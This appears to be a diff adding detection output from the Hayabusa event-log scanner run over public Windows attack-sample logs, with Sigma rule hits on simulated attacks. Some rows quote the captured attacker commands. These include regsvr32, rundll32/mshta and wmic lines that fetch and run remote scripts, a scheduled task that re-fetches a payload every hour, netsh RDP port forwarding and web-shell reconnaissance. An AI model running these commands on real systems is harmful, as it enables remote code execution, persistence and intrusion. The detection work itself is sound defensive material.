+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid  :  Command: winpm.exe  //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js  :  Path: C:\ProgramData\winpm.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories  :  Command: attrib  +h nbtscan.exe  :  Path: C:\Windows\System32\attrib.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
+2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
+2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe""   :  Path: C:\Users\IEUser\Downloads\com-hijack.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe  /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd.exe  /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt  :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F   :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic  process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: wmic  process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R  :  Path: C:\Windows\System32\wbem\WMIADAP.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat  :  Path: \\vboxsrv\HTools\msxsl.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh  I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5  :  Path: C:\Windows\System32\netsh.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user  :  Path: C:\Windows\System32\cmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net  user  :  Path: C:\Windows\System32\net.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1  user  :  Path: C:\Windows\System32\net1.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: net  user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""   :  Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
